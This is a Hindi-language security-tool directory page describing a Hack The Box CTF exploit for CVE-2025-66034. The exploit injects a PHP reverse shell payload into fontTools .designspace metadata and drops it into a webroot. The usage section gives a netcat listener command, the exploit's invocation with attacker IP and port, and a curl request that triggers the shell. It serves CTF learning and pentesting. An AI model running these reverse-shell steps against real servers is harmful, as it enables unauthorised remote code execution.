Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-66034-htb-ctf — VariaType HTB मशीन के लिए शोषण जो fontTools में XML इंजेक्शन का उपयोग करके .designspace मेटाडेटा में PHP रिवर्स शेल पेलोड के माध्यम से RCE प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/jwsly12/cve-2025-66034-htb-ctf
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubjwsly12/cve-2025-66034-htb-ctf

CVE-2025-66034-htb-ctf

VariaType HTB मशीन के लिए शोषण जो fontTools में XML इंजेक्शन का उपयोग करके .designspace मेटाडेटा में PHP रिवर्स शेल पेलोड के माध्यम से RCE प्राप्त करता है।

रिपॉजिटरी देखें
1275 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-66034-htb-ctf

VariaType वेरिएबल फ़ॉन्ट जनरेटर एक्सप्लॉइट

इस रिपॉजिटरी में Hack The Box पर स्थित VariaType मशीन के लिए एक विशेष एक्सप्लॉइट शामिल है। यह एक्सप्लॉइट fontTools लाइब्रेरी या वेब एप्लिकेशन द्वारा .designspace XML फ़ाइलों और मेटाडेटा इंटरपोलेशन को संभालने में मौजूद कमज़ोरी का लाभ उठाकर रिमोट कोड एक्ज़ीक्यूशन (RCE) प्राप्त करता है।

📝 विवरण

कमज़ोरी फ़ॉन्ट जनरेशन प्रक्रिया में मौजूद है। एक दुर्भावनापूर्ण designspace फ़ाइल तैयार करके, हम फ़ॉन्ट के मेटाडेटा (विशेष रूप से <labelname> फ़ील्ड) में PHP रिवर्स शेल पेलोड इंजेक्ट कर सकते हैं। जब सर्वर इन फ़ाइलों को प्रोसेस करके एक वेरिएबल फ़ॉन्ट तैयार करता है, तो यह आउटपुट को उपयोगकर्ता-परिभाषित पथ पर लिखता है, जिससे हम वेबरूट में एक .php शेल ड्रॉप कर सकते हैं।

🛠️ विशेषताएँ

  • स्वचालित फ़ॉन्ट जनरेशन: fontTools का उपयोग करके मान्य source-light.ttf और source-regular.ttf मास्टर फ़ॉन्ट बनाता है।
  • XML इंजेक्शन: CDATA-रैप्ड PHP पेलोड के साथ एक दुर्भावनापूर्ण designspace फ़ाइल जनरेट करता है।
  • पथ ट्रैवर्सल/आर्बिट्रेरी फ़ाइल राइट: परिणामी "फ़ॉन्ट" को सार्वजनिक निर्देशिका में .php फ़ाइल के रूप में सहेजने का प्रयास करता है।
  • रैंडमाइज़ेशन: संघर्षों से बचने के लिए अद्वितीय शेल नाम जनरेट करता है।

🚀 आवश्यकताएँ

आपके पास Python 3 इंस्टॉल होना चाहिए और निम्नलिखित लाइब्रेरीज़ भी:

pip install fontTools requests

💻 उपयोग

1. अपना लिसनर शुरू करें

अपनी स्थानीय मशीन (या Pwnbox) पर, Netcat लिसनर शुरू करें:

nc -lvnp 4444

2. एक्सप्लॉइट चलाएँ

अपना HTB VPN IP और लिसनर पोर्ट प्रदान करके स्क्रिप्ट चलाएँ:

python3 exploit.py --ip <YOUR_IP> --port 4444

3. शेल ट्रिगर करें

यदि अपलोड 200 OK (या कभी-कभी 500 भी, यदि त्रुटि से पहले प्रोसेसिंग हो जाती है) लौटाता है, तो स्क्रिप्ट फ़ाइल नाम प्रदान करेगी। इसे curl या अपने ब्राउज़र के माध्यम से एक्सेस करें:

curl http://portal.variatype.htb/shell_xxxxxx.php

⚙️ तर्क

तर्कविवरणडिफ़ॉल्ट
--ipआपका लिसनर IP (VPN)आवश्यक
--portआपका लिसनर पोर्टआवश्यक
--pathशेल के लिए लक्ष्य पथ/var/www/portal.variatype.htb/public
--urlअपलोड एंडपॉइंटhttp://variatype.htb/tools/.../process

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। पूर्व अनुमति के बिना लक्ष्यों तक पहुँचना या उन पर हमला करना अवैध है।


इस README का उपयोग कैसे करें:

  1. उपरोक्त सामग्री को अपनी स्क्रिप्ट वाली फ़ोल्डर में README.md के रूप में सहेजें।
  2. सुनिश्चित करें कि आपकी स्क्रिप्ट का नाम exploit.py है या ऊपर दिए गए कमांड्स में फ़ाइल नाम अपडेट करें।
टूल डाउनलोड करें